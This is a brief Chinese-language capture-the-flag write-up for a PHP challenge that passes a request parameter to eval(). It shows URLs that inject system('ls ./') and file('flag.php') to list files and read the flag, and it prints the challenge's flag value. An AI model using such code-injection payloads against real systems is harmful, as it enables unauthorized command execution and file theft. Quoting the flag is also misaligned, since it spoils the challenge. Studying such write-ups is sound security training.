打开容器后发现就是一段php代码文件,@$_REQUEST定义全局变量,eval用于执行表达式并返回结果值。先查看目录下的所有文件。
http://114.67.175.224:12574/?hello=system('ls ./')
接着读取flag.php的文件内容。
但是发现不行换一种方式读取。file()函数将整个文件读取到一个数组中,与file_get_contents()类似。
http://114.67.175.224:12574/?hello=file('flag.php')
拿到flag。 flag{fca14a2e7f209a89b2fc1c9bcbec9c26}